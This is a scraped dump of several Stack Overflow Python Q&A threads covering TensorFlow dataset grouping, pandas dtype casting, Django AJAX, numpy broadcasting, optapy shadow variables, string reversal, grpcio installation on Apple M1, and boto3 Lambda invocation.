"You could try utilizing tf.lookup.StaticHashTable like this:\nimport tensorflow as tf \n\nperson_tensor = tf.constant([\"person1\", \"person2\", \"person1\", \"person3\", \"person3\"])\nvalue_tensor = tf.constant([1,2,3,4,5])\n\nk_tensor = tf.unique(person_tensor)[0]\nv_tensor = tf.cast(tf.range(tf.shape(k_tensor)[0]), dtype=tf.int64)\ntable = tf.lookup.StaticHashTable(\n tf.lookup.KeyValueTensorInitializer(k_tensor, v_tensor),\n default_value=-1)\n\nreverse_table = tf.lookup.StaticHashTable(\n tf.lookup.KeyValueTensorInitializer(v_tensor, k_tensor),\n default_value=\"\")\n\nds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': table.lookup(person), 'value': value})\n\nwindow_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group\nds = ds.group_by_window(\n key_func=lambda row: row['person'],\n window_size=window_size,\n reduce_func=lambda key, rows: rows.batch(window_size)\n)\nds = ds.map(lambda d: {'person': tf.unique(reverse_table.lookup(d['person']))[0], 'value': d['value']})\nlist(ds.as_numpy_iterator())\n\n[{'person': array([b'person1'], dtype=object),\n 'value': array([1, 3], dtype=int32)},\n {'person': array([b'person2'], dtype=object),\n 'value': array([2], dtype=int32)},\n {'person': array([b'person3'], dtype=object),\n 'value': array([4, 5], dtype=int32)}]\n\nOr if you really have some unique number in your strings, you could also try using tf.strings.bytes_split and tf.strings.to_number:\nperson_tensor = tf.constant([\"person1\", \"person2\", \"person1\", \"person3\", \"person3\"])\nvalue_tensor = tf.constant([1,2,3,4,5])\nds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})\nwindow_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group\nds = ds.group_by_window(\n key_func=lambda row: tf.strings.to_number(tf.strings.bytes_split(row['person'])[-1], tf.int64),\n window_size=window_size,\n reduce_func=lambda key, rows: rows.batch(window_size)\n)\nds = ds.map(lambda d: {'person': tf.unique(d['person'])[0], 'value': d['value']})\n\nlist(ds.as_numpy_iterator())\n\n[{'person': array([b'person1'], dtype=object),\n 'value': array([1, 3], dtype=int32)},\n {'person': array([b'person2'], dtype=object),\n 'value': array([2], dtype=int32)},\n {'person': array([b'person3'], dtype=object),\n 'value': array([4, 5], dtype=int32)}]\n\nOr you could try using tf.strings.to_hash_bucket_fast:\nperson_tensor = tf.constant([\"person1\", \"person2\", \"person1\", \"person3\", \"person3\"])\nvalue_tensor = tf.constant([1,2,3,4,5])\nds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})\nwindow_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group\nds = ds.group_by_window(\n key_func=lambda row: tf.strings.to_hash_bucket_fast(row['person'], 5),\n window_size=window_size,\n reduce_func=lambda key, rows: rows.batch(window_size)\n)\nds = ds.map(lambda d: {'person': tf.unique(d['person'])[0], 'value': d['value']})\n\nlist(ds.as_numpy_iterator())\n\n[{'person': array([b'person3'], dtype=object),\n 'value': array([4, 5], dtype=int32)},\n {'person': array([b'person1'], dtype=object),\n 'value': array([1, 3], dtype=int32)},\n {'person': array([b'person2'], dtype=object),\n 'value': array([2], dtype=int32)}]\n\n"
] | [
1
] | [] | [] | [
"group_by",
"hashmap",
"python",
"tensorflow",
"tensorflow_datasets"
] | stackoverflow_0074602575_group_by_hashmap_python_tensorflow_tensorflow_datasets.txt |
Q:
pandas astype doesn't work as expected (fails silently and badly)
I've encountered this strange behavior of pandas .astype() (I'm using version 1.5.2). When trying to cast a column as integer, and later requesting dtypes, all seems fine. Until you try to extract the values by row, when you get inconsistent types.
Code:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.randn(3, 3))
df.loc[:, 0] = df.loc[:, 0].astype(int)
print(df)
print(df.dtypes)
print(df.iloc[0, :])
print(type(df.values[0, 0]))
Out:
0 1 2
0 0 -0.232432 1.025643
1 -1 0.556968 -0.729378
2 -1 1.285546 -0.541676
0 int64
1 float64
2 float64
dtype: object
0 0.000000
1 -0.232432
2 1.025643
Name: 0, dtype: float64
<class 'numpy.float64'>
Any guess of what I'm doing wrong here?
Tried to call without loc as
df[0] = df[0].astype(int)
dind't work either
A:
I think this is due to the usage of df.values because it will try to return a Numpy representation of the DataFrame. As per the docs
By default, the dtype of the returned array will be the common NumPy
dtype of all types in the DataFrame.
>>> from pandas.core.dtypes.cast import find_common_type
>>> find_common_type(df.dtypes.to_list()) # df is your dataframe
dtype('float64')
| pandas astype doesn't work as expected (fails silently and badly) | I've encountered this strange behavior of pandas .astype() (I'm using version 1.5.2). When trying to cast a column as integer, and later requesting dtypes, all seems fine. Until you try to extract the values by row, when you get inconsistent types.
Code:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.randn(3, 3))
df.loc[:, 0] = df.loc[:, 0].astype(int)
print(df)
print(df.dtypes)
print(df.iloc[0, :])
print(type(df.values[0, 0]))
Out:
0 1 2
0 0 -0.232432 1.025643
1 -1 0.556968 -0.729378
2 -1 1.285546 -0.541676
0 int64
1 float64
2 float64
dtype: object
0 0.000000
1 -0.232432
2 1.025643
Name: 0, dtype: float64
<class 'numpy.float64'>
Any guess of what I'm doing wrong here?
Tried to call without loc as
df[0] = df[0].astype(int)
dind't work either
| [
"I think this is due to the usage of df.values because it will try to return a Numpy representation of the DataFrame. As per the docs\n\nBy default, the dtype of the returned array will be the common NumPy\ndtype of all types in the DataFrame.\n\n>>> from pandas.core.dtypes.cast import find_common_type\n>>> find_common_type(df.dtypes.to_list()) # df is your dataframe\ndtype('float64')\n\n"
] | [
1
] | [] | [] | [
"casting",
"dtype",
"pandas",
"python"
] | stackoverflow_0074602610_casting_dtype_pandas_python.txt |
Q:
How to update the data on the page without reloading. Python - Django
I am a beginner Python developer. I need to update several values on the page regularly with a frequency of 1 second. I understand that I need to use Ajax, but I have no idea how to do it.
Help write an AJAX script that calls a specific method in the view
I have written view
class MovingAverage(TemplateView):
template_name = 'moving_average/average.html'
def get(self, request, *args, **kwargs):
return render(request, 'moving_average/average.html')
def post(self, request, *args, **kwargs):
self.symbol = request.POST.get('symbol')
self.interval = request.POST.get('interval')
self.periods = int(request.POST.get('periods')) if request.POST.get('periods') != '' else 0
self.quantity = float(request.POST.get('quantity')) if request.POST.get('quantity') != '' else 0
self.delta = float(request.POST.get('delta').strip('%')) / 100
self.button()
return render(request, 'moving_average/average.html')
A:
Here, we need two functions to call out data from AJAX:
First, we need to create JsonResponse views function in the views.py file.
# views.py
from django.http import JsonResponse
def get_some_data(request):
try:
if request.method == "POST":
get_some_data = [1, 2, 3, 4, 5] # You can run the query instead
return JsonResponse({"data": get_some_data})
else:
return JsonResponse({"error": "Invalid Method"})
except Exception as ep:
return JsonResponse({"error": str(ep)})
Create a path for this function in urls.py file.
# urls.py
path("get-some-data/", views.get_some_data, name="get-some-data")
Now, we create some AJAX call for getting data without reloading page ...
$.ajax({
type: "POST",
url: "{% url 'get-some-data' %}",
data: {
id: 2, // You can send any type of data ...
csrfmiddlewaretoken: $("input[name=csrfmiddlewaretoken]").val(), //This is important as we are making POST request, so CSRF verification is important ...
},
success: function(data) {
console.log(data); // Here you can manipulate some D.O.M. for rendering some data ...
}
})
That's it. You are good to go now.
| How to update the data on the page without reloading. Python - Django | I am a beginner Python developer. I need to update several values on the page regularly with a frequency of 1 second. I understand that I need to use Ajax, but I have no idea how to do it.
Help write an AJAX script that calls a specific method in the view
I have written view
class MovingAverage(TemplateView):
template_name = 'moving_average/average.html'
def get(self, request, *args, **kwargs):
return render(request, 'moving_average/average.html')
def post(self, request, *args, **kwargs):
self.symbol = request.POST.get('symbol')
self.interval = request.POST.get('interval')
self.periods = int(request.POST.get('periods')) if request.POST.get('periods') != '' else 0
self.quantity = float(request.POST.get('quantity')) if request.POST.get('quantity') != '' else 0
self.delta = float(request.POST.get('delta').strip('%')) / 100
self.button()
return render(request, 'moving_average/average.html')
| [
"Here, we need two functions to call out data from AJAX:\nFirst, we need to create JsonResponse views function in the views.py file.\n# views.py\n\nfrom django.http import JsonResponse\n\ndef get_some_data(request):\n try:\n if request.method == \"POST\":\n get_some_data = [1, 2, 3, 4, 5] # You can run the query instead\n return JsonResponse({\"data\": get_some_data})\n else:\n return JsonResponse({\"error\": \"Invalid Method\"})\n except Exception as ep:\n return JsonResponse({\"error\": str(ep)})\n\nCreate a path for this function in urls.py file.\n# urls.py\npath(\"get-some-data/\", views.get_some_data, name=\"get-some-data\")\n\nNow, we create some AJAX call for getting data without reloading page ...\n$.ajax({\n type: \"POST\",\n url: \"{% url 'get-some-data' %}\",\n data: {\n id: 2, // You can send any type of data ...\n csrfmiddlewaretoken: $(\"input[name=csrfmiddlewaretoken]\").val(), //This is important as we are making POST request, so CSRF verification is important ... \n },\n success: function(data) {\n console.log(data); // Here you can manipulate some D.O.M. for rendering some data ... \n }\n})\n\nThat's it. You are good to go now.\n"
] | [
0
] | [] | [] | [
"ajax",
"django",
"python"
] | stackoverflow_0074602453_ajax_django_python.txt |
Q:
How can you do an outer summation over only one dimension of a numpy 2D array?
I have a (square) 2 dimensional numpy array where I would like to compare (subtract) all of the values within each row to each other but not to other rows so the output should be a 3D array.
matrix = np.array([[10,1,32],[32,4,15],[6,3,1]])
Output should be a 3x3x3 array which looks like:
output = [[[0,-9,22],[0,-28,-17],[0,-3,-5]], [[9,0,31],[28,0,11],[3,0,-2]], [[-22,-31,0],[17,-11,0],[5,2,0]]]
I.e. for output[0], for each of the 3 rows of matrix, subtract that row's zeroth element from every other, for output[1] subtract each row's first element etc.
This seems to me like a reduced version of numpy's ufunc.outer functionality which should be possible with
tryouter = np.subtract(matrix, matrix)
and then taking some clever slice and/or transposition.
Indeed, if you do this, one finds that: output[i,j] = tryouter[i,j,i]
This looks like it should be solvable by using np.transpose to switch the 1 and 2 axes and then taking the arrays on the new 0,1 diagonal but I can't work out how to do this with numpy diagonal or any slicing method.
Is there a way to do this or is there a simpler approach to this whole problem built into numpy?
Thanks :)
A:
You're close, you can do it with broadcasting:
out = matrix[None, :, :] - matrix.T[:, :, None]
Here .T is the same as np.transpose, and using None as an index introduces a new dummy dimension of size 1.
| How can you do an outer summation over only one dimension of a numpy 2D array? | I have a (square) 2 dimensional numpy array where I would like to compare (subtract) all of the values within each row to each other but not to other rows so the output should be a 3D array.
matrix = np.array([[10,1,32],[32,4,15],[6,3,1]])
Output should be a 3x3x3 array which looks like:
output = [[[0,-9,22],[0,-28,-17],[0,-3,-5]], [[9,0,31],[28,0,11],[3,0,-2]], [[-22,-31,0],[17,-11,0],[5,2,0]]]
I.e. for output[0], for each of the 3 rows of matrix, subtract that row's zeroth element from every other, for output[1] subtract each row's first element etc.
This seems to me like a reduced version of numpy's ufunc.outer functionality which should be possible with
tryouter = np.subtract(matrix, matrix)
and then taking some clever slice and/or transposition.
Indeed, if you do this, one finds that: output[i,j] = tryouter[i,j,i]
This looks like it should be solvable by using np.transpose to switch the 1 and 2 axes and then taking the arrays on the new 0,1 diagonal but I can't work out how to do this with numpy diagonal or any slicing method.
Is there a way to do this or is there a simpler approach to this whole problem built into numpy?
Thanks :)
| [
"You're close, you can do it with broadcasting:\nout = matrix[None, :, :] - matrix.T[:, :, None]\n\nHere .T is the same as np.transpose, and using None as an index introduces a new dummy dimension of size 1.\n"
] | [
4
] | [] | [] | [
"array_broadcasting",
"numpy",
"python"
] | stackoverflow_0074602528_array_broadcasting_numpy_python.txt |
Q:
Is it possible to write a combined version of the OptaPlanner's task assignment and project scheduling examples in OptaPy?
I know that custom shadow variables are currently not supported in optapy, so is there a way to solve the optimization problem below: distribute tasks from the project among employees, given that the tasks have a clear order in which they must be performed and people have skills, depending on which the task execution time changes?
All ideas will be appreciated.
A:
Custom shadow variables ARE supported in optapy: https://www.optapy.org/docs/latest/shadow-variable/shadow-variable.html#customVariableListener ; It uses the old style of @CustomShadowVariable (@custom_shadow_variable in Python) instead of @ShadowVariable. However, ListVariableListener is not currently supported. You can use the old chained model of the domain and constraints, which should be fully supported in optapy. Support for the new @ShadowVariable and ListVariableListener will be added in a future version of optapy.
Here how the variable listener would look in Python:
from optapy import variable_listener
@variable_listener
class StartTimeUpdatingVariableListener:
def beforeEntityAdded(self, scoreDirector, task):
pass
def afterEntityAdded(self, scoreDirector, task):
self.updateStartTime(scoreDirector, task)
def beforeVariableChanged(self, scoreDirector, task):
pass
def afterVariableChanged(self, scoreDirector, task):
self.updateStartTime(scoreDirector, task)
def beforeEntityRemoved(self, scoreDirector, task):
pass
def afterEntityRemoved(self, scoreDirector, task):
pass
def updateStartTime(self, scoreDirector, sourceTask):
previous = sourceTask.getPreviousTaskOrEmployee()
shadowTask = sourceTask
previousEndTime = None if previous is None else previous.getEndTime()
startTime = self.calculateStartTime(shadowTask, previousEndTime)
while shadowTask is not None and shadowTask.getStartTime() != startTime:
scoreDirector.beforeVariableChanged(shadowTask, "startTime")
shadowTask.setStartTime(startTime)
scoreDirector.afterVariableChanged(shadowTask, "startTime")
previousEndTime = shadowTask.getEndTime()
shadowTask = shadowTask.getNextTask()
startTime = self.calculateStartTime(shadowTask, previousEndTime)
def calculateStartTime(self, task, previousEndTime):
if task is None or previousEndTime is None:
return None
return max(task.getReadyTime(), previousEndTime)
and here how it can be used in a @custom_shadow_variable:
from optapy import planning_entity, planning_variable, custom_shadow_variable, planning_variable_reference
@planning_entity
class Task:
# ...
@custom_shadow_variable(variable_listener_class = StartTimeUpdatingVariableListener,
sources=[planning_variable_reference('previousTaskOrEmployee')])
def get_start_time(self):
return self.start_time
def set_start_time(self, start_time):
self.start_time = start_time
| Is it possible to write a combined version of the OptaPlanner's task assignment and project scheduling examples in OptaPy? | I know that custom shadow variables are currently not supported in optapy, so is there a way to solve the optimization problem below: distribute tasks from the project among employees, given that the tasks have a clear order in which they must be performed and people have skills, depending on which the task execution time changes?
All ideas will be appreciated.
| [
"Custom shadow variables ARE supported in optapy: https://www.optapy.org/docs/latest/shadow-variable/shadow-variable.html#customVariableListener ; It uses the old style of @CustomShadowVariable (@custom_shadow_variable in Python) instead of @ShadowVariable. However, ListVariableListener is not currently supported. You can use the old chained model of the domain and constraints, which should be fully supported in optapy. Support for the new @ShadowVariable and ListVariableListener will be added in a future version of optapy.\nHere how the variable listener would look in Python:\nfrom optapy import variable_listener\n\n@variable_listener\nclass StartTimeUpdatingVariableListener:\n\n def beforeEntityAdded(self, scoreDirector, task):\n pass\n \n def afterEntityAdded(self, scoreDirector, task):\n self.updateStartTime(scoreDirector, task)\n \n def beforeVariableChanged(self, scoreDirector, task):\n pass\n\n def afterVariableChanged(self, scoreDirector, task):\n self.updateStartTime(scoreDirector, task)\n\n def beforeEntityRemoved(self, scoreDirector, task):\n pass\n\n def afterEntityRemoved(self, scoreDirector, task):\n pass\n\n def updateStartTime(self, scoreDirector, sourceTask):\n previous = sourceTask.getPreviousTaskOrEmployee()\n shadowTask = sourceTask\n previousEndTime = None if previous is None else previous.getEndTime()\n startTime = self.calculateStartTime(shadowTask, previousEndTime)\n while shadowTask is not None and shadowTask.getStartTime() != startTime:\n scoreDirector.beforeVariableChanged(shadowTask, \"startTime\")\n shadowTask.setStartTime(startTime)\n scoreDirector.afterVariableChanged(shadowTask, \"startTime\")\n previousEndTime = shadowTask.getEndTime()\n shadowTask = shadowTask.getNextTask()\n startTime = self.calculateStartTime(shadowTask, previousEndTime)\n\n def calculateStartTime(self, task, previousEndTime):\n if task is None or previousEndTime is None:\n return None\n return max(task.getReadyTime(), previousEndTime)\n\nand here how it can be used in a @custom_shadow_variable:\nfrom optapy import planning_entity, planning_variable, custom_shadow_variable, planning_variable_reference\n\n@planning_entity\nclass Task:\n # ...\n @custom_shadow_variable(variable_listener_class = StartTimeUpdatingVariableListener,\n sources=[planning_variable_reference('previousTaskOrEmployee')])\n def get_start_time(self):\n return self.start_time\n \n def set_start_time(self, start_time):\n self.start_time = start_time\n\n"
] | [
1
] | [] | [] | [
"optaplanner",
"optapy",
"python"
] | stackoverflow_0074572053_optaplanner_optapy_python.txt |
Q:
trying to reverse words while maintaining order and print but having trouble figuring out the problem
I have written code that should do as the title says but im getting "TypeError: can only join an iterable"
on line 12, in reverse_words d.append(''.join(c))
here is my following code-
def reverse_words(text):
#makes 'apple TEST' into ['apple', 'TEST']
a = text.split(' ')
d = []
for i in a:
#takes 'apple' and turns it into ['a','p','p','l','e']
b = i.split()
#takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']
c = b.reverse()
#takes ['e','l','p','p','a'] and turns it into 'elppa'
#appends 'elppa' onto d
d.append(''.join(c))
#whole thing repeats for 'TEST' as well
#joins d together by a space and should print out 'elppa TSET'
print(' '.join(d))
reverse_words('apple TEST')
I know it has to do something that I messed up with c but I cannot identify it.
trying to reverse words while maintaining order but i got a type error
A:
Perhaps you could consider utilizing str.join on a comprehension that uses list slicing to reverse a string:
def reverse_words(text: str) -> str:
return ' '.join(word[::-1] for word in text.split(' '))
A:
The reverse() method for lists reverses elements in-place and doesn't return an iterable, meaning it will return a none object if the method runs successfully. You can modify your code like this:
def reverse_words(text):
#makes 'apple TEST' into ['apple', 'TEST']
a = text.split(' ')
d = []
for i in a:
#takes 'apple' and turns it into ['a','p','p','l','e']
b = i.split()
#takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']
b.reverse()
#takes ['e','l','p','p','a'] and turns it into 'elppa'
#appends 'elppa' onto d
d.append(''.join(b))
#whole thing repeats for 'TEST' as well
#joins d together by a space and should print out 'elppa TSET'
print(' '.join(d))
reverse_words('apple TEST')
You can also use the reversed() method if you want the reversed list in a new variable like so:
def reverse_words(text):
#makes 'apple TEST' into ['apple', 'TEST']
a = text.split(' ')
d = []
for i in a:
#takes 'apple' and turns it into ['a','p','p','l','e']
b = i.split()
#takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']
c = reversed(b)
#takes ['e','l','p','p','a'] and turns it into 'elppa'
#appends 'elppa' onto d
d.append(''.join(c))
#whole thing repeats for 'TEST' as well
#joins d together by a space and should print out 'elppa TSET'
print(' '.join(d))
reverse_words('apple TEST')
| trying to reverse words while maintaining order and print but having trouble figuring out the problem | I have written code that should do as the title says but im getting "TypeError: can only join an iterable"
on line 12, in reverse_words d.append(''.join(c))
here is my following code-
def reverse_words(text):
#makes 'apple TEST' into ['apple', 'TEST']
a = text.split(' ')
d = []
for i in a:
#takes 'apple' and turns it into ['a','p','p','l','e']
b = i.split()
#takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']
c = b.reverse()
#takes ['e','l','p','p','a'] and turns it into 'elppa'
#appends 'elppa' onto d
d.append(''.join(c))
#whole thing repeats for 'TEST' as well
#joins d together by a space and should print out 'elppa TSET'
print(' '.join(d))
reverse_words('apple TEST')
I know it has to do something that I messed up with c but I cannot identify it.
trying to reverse words while maintaining order but i got a type error
| [
"Perhaps you could consider utilizing str.join on a comprehension that uses list slicing to reverse a string:\ndef reverse_words(text: str) -> str:\n return ' '.join(word[::-1] for word in text.split(' '))\n\n",
"The reverse() method for lists reverses elements in-place and doesn't return an iterable, meaning it will return a none object if the method runs successfully. You can modify your code like this:\ndef reverse_words(text):\n #makes 'apple TEST' into ['apple', 'TEST']\n a = text.split(' ')\n d = []\n for i in a:\n #takes 'apple' and turns it into ['a','p','p','l','e']\n b = i.split()\n #takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']\n b.reverse()\n #takes ['e','l','p','p','a'] and turns it into 'elppa'\n #appends 'elppa' onto d\n d.append(''.join(b))\n #whole thing repeats for 'TEST' as well\n #joins d together by a space and should print out 'elppa TSET'\n print(' '.join(d))\n\nreverse_words('apple TEST')\n\nYou can also use the reversed() method if you want the reversed list in a new variable like so:\ndef reverse_words(text):\n #makes 'apple TEST' into ['apple', 'TEST']\n a = text.split(' ')\n d = []\n for i in a:\n #takes 'apple' and turns it into ['a','p','p','l','e']\n b = i.split()\n #takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']\n c = reversed(b)\n #takes ['e','l','p','p','a'] and turns it into 'elppa'\n #appends 'elppa' onto d\n d.append(''.join(c))\n #whole thing repeats for 'TEST' as well\n #joins d together by a space and should print out 'elppa TSET'\n print(' '.join(d))\n\nreverse_words('apple TEST')\n\n"
] | [
0,
0
] | [
"d.append('').join(d)\n\nIf this is what you intended try this, otherwise you're gonna need to call a new variable and call .join() on that\n"
] | [
-1
] | [
"python"
] | stackoverflow_0074595185_python.txt |
Q:
Grpcio fails installation for Tensorflow 2.5 on arm64 Apple Silicon
I'm following the instructions here: https://developer.apple.com/metal/tensorflow-plugin/ and having issues installing grpcio. When I try python -m pip install tensorflow-macos I get:
AssertionError: would build wheel with unsupported tag ('cp39', 'cp39', 'macosx_11_0_arm64')
----------------------------------------
ERROR: Failed building wheel for grpcio
The subsequent attempt also ends in an error:
Running setup.py clean for grpcio
Failed to build grpcio
Installing collected packages: grpcio, tensorflow-estimator, keras-nightly, flatbuffers
Attempting uninstall: grpcio
Found existing installation: grpcio 1.38.1
Uninstalling grpcio-1.38.1:
Successfully uninstalled grpcio-1.38.1
Running setup.py install for grpcio ... error
The solutions given here: How can I install GRPCIO on an Apple M1 Silicon laptop? have unfortunately not worked to me.
I am quite inexperienced with architecture/chip challenges, but it reads that the arm64 is currently not supported? If that is the case it is odd that it is included in the tensorflow_plugin steps. Any thoughts on what I am doing wrong would be appreciated.
A:
What helped me was:
GRPC_PYTHON_BUILD_SYSTEM_OPENSSL=1 GRPC_PYTHON_BUILD_SYSTEM_ZLIB=1 python -m pip install tensorflow-macos
A:
I had to
Build boringssl manually (github answer)
Use the flags while installing grpcio as explained in the previous answer
Upgrade numpy (TypeError StackOverflow)
Install
# The following are required to locally build boringssl
brew install go
brew install wget
brew install cmake
mkdir boringssl
cd boringssl
wget https://boringssl.googlesource.com/boringssl/+archive/master.tar.gz
gunzip -c master.tar.gz | tar xopf -
mkdir build
cd build
cmake ..
make
# Install `grpcio` with the right
YCFLAGS="-I /opt/homebrew/opt/openssl/include" LDFLAGS="-L /opt/homebrew/opt/openssl/lib" GRPC_PYTHON_BUILD_SYSTEM_OPENSSL=1 GRPC_PYTHON_BUILD_SYSTEM_ZLIB=1 pip install 'grpcio'
pip install tensorflow-macos
# If you see an error like below then upgrade numpy
#
# TypeError: Unable to convert function return value to a Python type! The signature was () -> handle
pip install numpy --upgrade
Test
python -c "import tensorflow as tf; print(tf.reduce_sum(tf.random.normal([1000, 1000])))"
| Grpcio fails installation for Tensorflow 2.5 on arm64 Apple Silicon | I'm following the instructions here: https://developer.apple.com/metal/tensorflow-plugin/ and having issues installing grpcio. When I try python -m pip install tensorflow-macos I get:
AssertionError: would build wheel with unsupported tag ('cp39', 'cp39', 'macosx_11_0_arm64')
----------------------------------------
ERROR: Failed building wheel for grpcio
The subsequent attempt also ends in an error:
Running setup.py clean for grpcio
Failed to build grpcio
Installing collected packages: grpcio, tensorflow-estimator, keras-nightly, flatbuffers
Attempting uninstall: grpcio
Found existing installation: grpcio 1.38.1
Uninstalling grpcio-1.38.1:
Successfully uninstalled grpcio-1.38.1
Running setup.py install for grpcio ... error
The solutions given here: How can I install GRPCIO on an Apple M1 Silicon laptop? have unfortunately not worked to me.
I am quite inexperienced with architecture/chip challenges, but it reads that the arm64 is currently not supported? If that is the case it is odd that it is included in the tensorflow_plugin steps. Any thoughts on what I am doing wrong would be appreciated.
| [
"What helped me was:\nGRPC_PYTHON_BUILD_SYSTEM_OPENSSL=1 GRPC_PYTHON_BUILD_SYSTEM_ZLIB=1 python -m pip install tensorflow-macos\n\n",
"I had to\n\nBuild boringssl manually (github answer)\nUse the flags while installing grpcio as explained in the previous answer\nUpgrade numpy (TypeError StackOverflow)\n\nInstall\n# The following are required to locally build boringssl\nbrew install go\nbrew install wget\nbrew install cmake\nmkdir boringssl\ncd boringssl\nwget https://boringssl.googlesource.com/boringssl/+archive/master.tar.gz\ngunzip -c master.tar.gz | tar xopf -\nmkdir build\ncd build\ncmake ..\nmake\n\n# Install `grpcio` with the right \nYCFLAGS=\"-I /opt/homebrew/opt/openssl/include\" LDFLAGS=\"-L /opt/homebrew/opt/openssl/lib\" GRPC_PYTHON_BUILD_SYSTEM_OPENSSL=1 GRPC_PYTHON_BUILD_SYSTEM_ZLIB=1 pip install 'grpcio'\npip install tensorflow-macos\n\n# If you see an error like below then upgrade numpy\n#\n# TypeError: Unable to convert function return value to a Python type! The signature was () -> handle\npip install numpy --upgrade\n\nTest\npython -c \"import tensorflow as tf; print(tf.reduce_sum(tf.random.normal([1000, 1000])))\"\n\n"
] | [
3,
0
] | [] | [] | [
"apple_m1",
"grpcio",
"python",
"tensorflow"
] | stackoverflow_0069151553_apple_m1_grpcio_python_tensorflow.txt |
Q:
Python AWS Lambda Execution New Update
Update
I changed the params to receive the data directly from a JSON dump to see if that fixed the JSON load issue. Received a new error:
(b'{\n "errorType": "ValidationMetadataException",\n
"errorMessage": "The a' b'rgument is null or empty. Provide an
argument that is not null or empty, and' b' then try the command
again.",\n "stackTrace": [\n "at Amazon.Lambda.P'
b'owerShellHost.PowerShellFunctionHost.ExecuteFunction(Stream
inputStream, ILa' b'mbdaContext context)",\n "at
lambda_method1(Closure , Stream , ILambda' b'Context , Stream )",\n
"at Amazon.Lambda.RuntimeSupport.Bootstrap.User'
b'CodeLoader.Invoke(Stream lambdaData, ILambdaContext lambdaContext,
Stream ou' b'tStream) in
/src/Repo/Libraries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/U'
b'serCodeLoader.cs:line 145",\n "at
Amazon.Lambda.RuntimeSupport.Handler'
b'Wrapper.<>c__DisplayClass8_0.b__0(InvocationRequest
invoc' b'ation) in
/src/Repo/Libraries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/Han'
b'dlerWrapper.cs:line 56",\n "at
Amazon.Lambda.RuntimeSupport.LambdaBoot'
b'strap.InvokeOnceAsync(CancellationToken cancellationToken) in
/src/Repo/Libr'
b'aries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/LambdaBootstrap.cs:line
176' b'"\n ]\n}\n')
Still having no success with passing in the lambda name. The code has been updated from the previous post.
==============================================================
ORIGINAL POST
I am trying to execute a lambda function through python. I can successfully do it when I hardcode the variables but when I substitute the variables in I am unable to process the lambda.
Here is the working sample with hardcoded values:
params = {"value1": "value1-value", "value2": "value2-value", "value3": "value3-value"}
client = boto3.client('lambda')
response = client.invoke(
FunctionName='MyLambdaFunctionName',
InvocationType='RequestResponse',
Payload=json.dumps(params).encode(),
)
pprint.pp(response['Payload'].read())
The part that fails is when I replace params with variables. The plan is to pass them in, as I call values but right now, I am testing it and setting the values in the function. The variables are listed below:
json_data |
lambdaName |
lambdaName = os.getenv('TF_VAR_lambdaName')
value1="value1-value"
value2="value2-value"
value3="value3-value"
data = {"value1": "value1-value", "value2": "value2-value", "value3": "value3-value"}
params = json.dumps(data)
client = boto3.client('lambda')
response = client.invoke(
FunctionName=lambdaName,
InvocationType='RequestResponse',
Payload=json.dumps(params).encode(),
)
pprint.pp(response['Payload'].read())
The error I get goes away when I hard-code the JSON or the Lambda Function Name.
The error log I am getting is listed below:
> Traceback (most recent call last): File
> "/Users/go/src/github.com/repo/./cleanup/cleanup.py", line 25, in
> <module>
> response = client.invoke( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 515, in _api_call
> return self._make_api_call(operation_name, kwargs) File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 893, in _make_api_call
> request_dict = self._convert_to_request_dict( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 964, in _convert_to_request_dict
> request_dict = self._serializer.serialize_to_request( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/validate.py",
> line 381, in serialize_to_request
> raise ParamValidationError(report=report.generate_report()) botocore.exceptions.ParamValidationError: Parameter validation failed:
> Invalid type for parameter FunctionName, value: None, type: <class
> 'NoneType'>, valid types: <class 'str'>
A:
I think the problem you have is in the definition of your lambda:
lambdaName = os.getenv('TF_VAR_lambdaName')
Try following:
LAMBDA_NAME = os.environ.get('YOUR_LAMBDA_NAME') // make sure you put the exact name of your lambda in ''
Than use it in your code:
response = client.invoke(
FunctionName=LAMBDA_NAME,
InvocationType='RequestResponse',
Payload=json.dumps(params).encode()
)
A:
The community, thanks for your support here. I finally figured it out with the help of my colleague.
So the first issue:
lambdaName = os.getenv('TF_VAR_lambdaName')
This was odd that it wasn't working since i had already exported the environment variables using
export TF_VAR_lambdaName="myfunctionname"
I ended up using a print statement to check the value, and it came out with none. Googling it a bit, found a post where someone suggested rerunning the export to set the value again and that did the trick. I did take a bit from Olgas suggestion and modified the export as follows:
LAMBDA_NAME = os.getenv('TF_VAR_lambdaName')
just making the variable all caps to avoid any issues.
Second Issue:
This one turned out to be an easy fix. The short in sweet of it is I didn't need
json.dumps(data)
The declaration of data was already being passed in a format that params needed. What worked was just setting params equal to data and lambda was able to handle it. Final working code below:
#!/usr/bin/env python
import boto3
import json
import pprint
import os
LAMBDA_NAME = os.getenv('TF_VAR_lambdaName')
value1="value1-value"
value2="value2-value"
value3="value3-value"
data = {"value1": value1, "value2": value2 "value3": value3}
params = data
client = boto3.client('lambda')
response = client.invoke(
FunctionName=LAMBDA_NAME,
InvocationType='RequestResponse',
Payload=json.dumps(params).encode(),
)
pprint.pp(response['Payload'].read())
| Python AWS Lambda Execution New Update | Update
I changed the params to receive the data directly from a JSON dump to see if that fixed the JSON load issue. Received a new error:
(b'{\n "errorType": "ValidationMetadataException",\n
"errorMessage": "The a' b'rgument is null or empty. Provide an
argument that is not null or empty, and' b' then try the command
again.",\n "stackTrace": [\n "at Amazon.Lambda.P'
